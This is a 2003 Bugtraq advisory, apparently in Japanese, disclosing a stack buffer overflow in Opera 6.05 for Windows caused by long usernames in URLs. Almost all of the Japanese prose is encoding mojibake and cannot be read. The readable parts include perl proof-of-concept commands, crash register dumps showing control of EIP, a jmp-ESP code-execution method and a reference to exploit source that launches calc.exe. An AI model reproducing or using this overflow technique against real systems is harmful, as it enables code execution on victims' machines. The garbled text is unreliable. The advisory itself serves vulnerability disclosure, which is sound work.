Bugtraq in Japanese
Opera$B$K$*$1$kD9$$%f!<%6(B $B!<L>$G5/$3$k%P%C%U%!%*(B $B!<%P!<%U%m!<$K$h$k@H<e(B $B@-(B Feb 09 2003 02:41PM
nesumin (nesumin softhome net)
$B3'$5$s$3$s$K$A$O!#(B

$B$3$3$K(BOpera$B$N@H<e@-$K$D$$$F$N>pJs$r8x3+$7$^$9!#(B
$B;dC#$O$3$N@H<e@-$,Aa5^$K=$@5$5$l$k$3$H$r4j$C$F$$$^$9!#(B

_________________________________________________

----------------------------------------------------------------
$BMWLs!!!!!!!!(B: Opera$B$K$*$1$kD9$$%f!<%6!<L>$G5/$3$k%P%C%U%!(B
$B!!!!!!!!!!!!(B $B%*!<%P!<%U%m!<$K$h$k@H<e@-(B
$B@=IJ!!!!!!!!(B: Opera for Windows
$B%P!<%8%g%s!!(B: 6.05 build1140 (+ Opera7 beta2 build2577)
$B%Y%s%@!<!!!!(B: Opera Software ASA (http://www.opera.com/)
$B4m81EY!!!!!!(B: $B?<9o!#G$0U$N%P%$%J%j%3!<%I$N<B9T$,2DG=(B
$B%j%b!<%H!!!!(B: $B$O$$(B
$B%m!<%+%k!!!!(B: $B$O$$(B
$BH/8+<T!!!!!!(B: nesumin <nesumin (at) softhome (dot) net [email concealed]>
$BJs9pF|!!!!!!(B: 2003-02-02
$B8x3+F|!!!!!!(B: 2003-02-09
$B#H#T#M#LHG!!(B: http://opera.rainyblue.org/special/o6unexp.php
-------------------------------------------------------------- --

0. $B@=IJ>pJs(B

Opera$B$O(BGUI$B%Y!<%9$N(BWEB$B%V%i%&%6!<$G$9!#(B
Mail$B!"(BNews$B!"(BIM$B%/%i%$%"%s%H$rJ;$;;}$C$F$*$j!"(BWindows$B
!"(BLinux$B!"(BFreeBSD$B!"(B
$B$=$NB>$GF0:n$7$^$9!#(B

Opera Software ASA
http://www.opera.com/

1. $B35MW(B

Windows$BMQ(B Opera6.05 $B$K$OD9$$%f!<%6!<%M!<%`$r4^$`!V(Bhttp://$B!W$G(B
$B;O$^$k(BURL$B$r3+$/;~!"%9%?%C%/>e$G%P%C%U%!%*!<%P!<%U%m!<$,H/@8$9$k
(B
$B$H$$$&?<9o$J%;%-%e%j%F%#!<%[!<%k$,$"$j$^$9!#(B

$B967b<T$O%j%s%/(B($B%"%s%+!<%?%0(B)$B!"2hA|(B($B%$%a!<%8%?%0(B)
$B!"%U%l!<%`!"(B
$B%9%/%j%W%H$J$I$rMQ$$$F%P%C%U%!%*!<%P!<%U%m!<$r0z$-5/$3$9$3$H$,$G$-!"
(B
$B%9%?%C%/Fb$KJ]B8$5$l$F$$$k(BRET$B%"%I%l%9$r>e=q$-$9$k$3$H$G!"(B
$BG$0U$N%P%$%J%j%3!<%I$r<B9T$9$k$3$H$,2DG=$G$9!#(B

$B$b$7!"(BOpera$B%f!<%6!<$,0-0U$"$k:Y9)$5$l$?(BURL$B$r3+$3$&$H$9$l$
P!"(B
$B$=$l$K$h$C$F%&%#%k%9$d%H%m%$$NLZGO$X$N46@w!"%7%9%F%`GK2u!"(B
$B%M%C%H%o!<%/$X$N%G!<%?O31LEy$NHo32$KAx$&4m81@-$,$"$j$^$9!#(B

2. $B%F%9%H$7$?%P!<%8%g%s(B

Opera (Windows$BMQ(B)
Opera6.05 build 1140
Opera7 beta2 build 2577
Opera7.00 build 2637
Opera7.01 build 2651
$B3F1Q8lHG!\F|K\8lHG(B

Platform
Windows98SE JP
Windows2000 SP3 JP
Windows2000 XP SP1 JP

3. $B@H<e@-$,3NG'$G$-$?%P!<%8%g%s(B

Opera6.05 build 1140
Opera7 beta2 build 2577

4. $BEv@H<e@-$,3NG'$G$-$J$+$C$?%P!<%8%g%s(B

Opera7.00 build 2637
Opera7.01 build 2651

5. $B%Y%s%@!<$NBP1~(B

$BJs9p:Q$_!#(B(2003/02/02)
$B@5<0$J2sEz$,$J$$$?$a!"%Y%s%@!<$NBP1~>u67$OITL@!#(B

6. $B2sHrJ}K!(B

$B%Y%s%@!<$K$h$k=$@5$^$G$N;CDjE*$J2sHrJ}K!$H$7$F!"(B
$B0J2<$NJ}K!$rDs0F$7$^$9!#(B

$B8@8l%U%!%$%k(B(*.lng)$BFb$N%j%=!<%9HV9f!V(B21463$B!W$NJ8;zNs$K$"$
k(B
$B#2$D$N!V(B%s$B!W$r>C5n$7$^$9!#(B
$B$3$l$K$h$j(BURL$B7Y9p%@%$%"%m%0$G$O%f!<%6!<L>$b%5!<%P!<L>$b(B
$BI=<($5$l$J$/$J$j$^$9$,!"Ev@H<e@-$r2sHr$9$k$3$H$,$G$-$^$9!#(B
($B%U%!%$%k$rJT=8$9$k:]$O%P%C%/%"%C%W$r<h$j$^$7$g$&(B)

7. $B>\:Y(B

Opera$B$O%f!<%6!<%M!<%`$r4^$`!V(Bhttp://$B!W$G;O$^$k(BURL$B$r3+$3$&
$H$9$k$H!"(B
$B8@8l%U%!%$%kFb$K$"$k%j%=!<%9HV9f!V(B21463$B!W$N%U%)!<%^%C%HJ8;zNs$r
(B
$B;HMQ$7$F!"!V(BURL$B7Y9p%@%$%"%m%0!W$KI=<($9$kJ8;zNs$r@8@.$7$^$9!#(
B

$B$=$N;~!"%f!<%6!<%M!<%`$KBP$9$kD9$5%A%'%C%/$,L5$$$?$a!"(B
$BD9$$%f!<%6!<%M!<%`$r;XDj$9$k$3$H$G%9%?%C%/>e$N%m!<%+%k%P%C%U%!$G(B
$B%*!<%P!<%U%m!<$,H/@8$7$^$9!#(B(URL$BA4BN$ND9$5$K$O@)8B$,$"$j$^$9(B
)

$B$*$h$=(B 2624 $BJ8;z(B(16bit)$B$/$i$$$G(BRET$B%"%I%l%9$r>e=q$-$G$-$^$9!#(B
$B$^$?!"$=$N%*%U%;%C%HCM$O!V(B21463$B!W$NJ8;zNs$K0MB8$7$^$9!#(B

[Opera6.05 build 1140, english language file]

$ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"

---------------------------------------------------------------------
Exception C0000005
EAX=00410041 EBX=01B5F9BA ECX=0012E254 EDX=01B60E58 ESI=01A8A940
EDI=77DF6001 EBP=0012E278 ESP=0012CDD8 EIP=00423D68 FLAGS=00000216

0012CDD8 00000110 00000001 005F2464 00200020 ........d$_. . .
0012CDE8 00200020 00730055 00720065 0061006E . .U.s.e.r.n.a.
0012CDF8 0065006D 0020003A 00410041 00410041 m.e.:. .A.A.A.A.
0012CE08 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
....
0012E268 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0012E278 >00410041 00410041 007D0020 007C031E A.A.A.A. .....|.
0012E288 01A8A940 007D02D0 0012E2D8 00000000 @.....}...E.....
---------------------------------------------------------------------

$B>e5-$N>l9g$O(BRET$B%"%I%l%9$K(BEIP$B$,0\$kA0$K%"%/%;%9%P%$%*%l!<%
7%g%s$,(B
$BH/@8$7$^$9$,!">e=q$-8e$K;2>H$5$l$F$$$kNN0h$r(B0x80000001$BEy$NCM$K%
;%C%H(B
$B$7$F$*$/$3$H$K$h$j(BEIP$B$r0\$9$3$H$,$G$-$^$9!#(B

$ perl -e "exec('opera.exe','http://'.'%01%e8%80%80'x 1311 .'%ef%bb%be'x 2 .'@/')"

"%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
("$BA4$F$N%"%I%l%9$r(BUTF-8$B$G%(%s%3!<%I$9$k(B" $B@_Dj$K$7$F$*$/(B)

---------------------------------------------------------------------
Exception C0000005
EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8 ESI=00000001
EDI=00000110 EBP=80000001 ESP=0012E28C *EIP=FEFEFEFE FLAGS=00000202
---------------------------------------------------------------------

$B$=$N;~!"(BESP$B%l%8%9%?$O(BRET$B%"%I%l%9$^$G$N%*%U%;%C%HCM!\(B0x
10$B%P%$%HJU$j$N(B
$B0LCV$r;X$7$^$9!#(B

$B=>$C$F(BRET$B%"%I%l%9$r!V(Bjmp ESP$B!WL?Na$X$N%"%I%l%9$G>e=q$-$7!"(B
ESP$B$,;X$9%"%I%l%90J8e$KG$0U$N%P%$%J%j%3!<%I$rCV$/$3$H$G(B
$B$=$N%P%$%J%j%3!<%I$r<B9T$9$k$3$H$,2DG=$G$9!#(B

Opera7.00 build 2637 $B0J9_$G$O$3$N@H<e@-$r3NG'$G$-$^$;$s$G$7$?!#(B

[$BHw9M(B]

$B$3$N@H<e@-$G%P%C%U%!$K=q$-9~$^$l$k%f!<%6!<%M!<%`$O(B
16bit$B%o%$%IJ8;z$KJQ49$5$l$?$b$N$G$9!#(B

$B!V(BURL$B$r(BUTF-8$B$G%(%s%3!<%I$7$FAw$k!W@_Dj$r%*%s$K$7$F$$$k$H
(B
UTF$BEy$G%(%s%3!<%I$7$?%f!<%6!<%M!<%`$r;XDj$7$?$H$-$K!"(B
$BMF0W$K0U?^$7$?%G!<%?$r%a%b%j>e$KE83+$9$k$3$H$,$G$-$^$9!#(B

$B5U$K!V(BURL$B$r(BUTF-8$B$G%(%s%3!<%I$7$FAw$k!W@_Dj$r%*%U$K$7$F$$$
k$H(B
$BHs>o$K:$Fq$K$J$j$^$9!#(B

8. $B%5%s%W%k(B

$B!&8!>ZL\E*0J30!"$^$?<+?H$N=jM-J*!"5Z$S$=$l$K=`$:$kJ*0J30(B
$B$G$N;HMQ$r6X$8$^$9!#(B
$B!&$3$N%5%s%W%k$rMxMQ$7$?7k2L!"G!2?$J$kB;32$,@8$8$F$bEvJ}$O(B
$B0l@Z@UG$$rIi$$$^$;$s!#(B

$B!~(B $B%G%b%s%9%H%l!<%7%g%s(B($BF|K\8l$N$_(B)

http://opera.rainyblue.org/special/o6unexp_demo.php

$B!~(B $B%5%s%W%k(BExploit$B%=!<%9%3!<%I(B($BE:IU%U%!%$%k(Bo6unexp.c.gz$
BFb(B)

o6unexp.c

$B$3$N%=!<%9%3!<%I$OEv@H<e@-$rMxMQ$7$F!V(Bcalc.exe$B!W(B($BEEBn(B)
$B$r(B
$B<B9T$5$;$k(BHTML$B%U%!%$%k$r@8@.$9$k%W%m%0%i%`$G$9!#(B
Visual C++ 6$B$G%3%s%Q%$%k$G$-$k$3$H$r3NG'$7$F$$$^$9!#(B

9. $B6(NO(B

:: Operash :: (http://opera.rainyblue.org/)

imagine (Operash webmaster)
melorin

10.$BO"Mm@h!"$=$NB>(B

nesumin <nesumin (at) softhome (dot) net [email concealed]>

$BEv>pJs$OFbMF$,J]>Z$5$l$F$$$k$b$N$G$O$"$j$^$;$s!#(B
$BKt!"E,;~=$@5$5$l$k2DG=@-$,$"$j$^$9!#(B
$BEv>pJs$K$h$jH/@8$7$?G!2?$J$kB;32$bEvJ}$O0l@Z$N@UG$$rIi$$$^$;$s!#(B

_________________________________________________

------------------------------------------------------
nesumin <nesumin (at) softhome (dot) net [email concealed]>

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus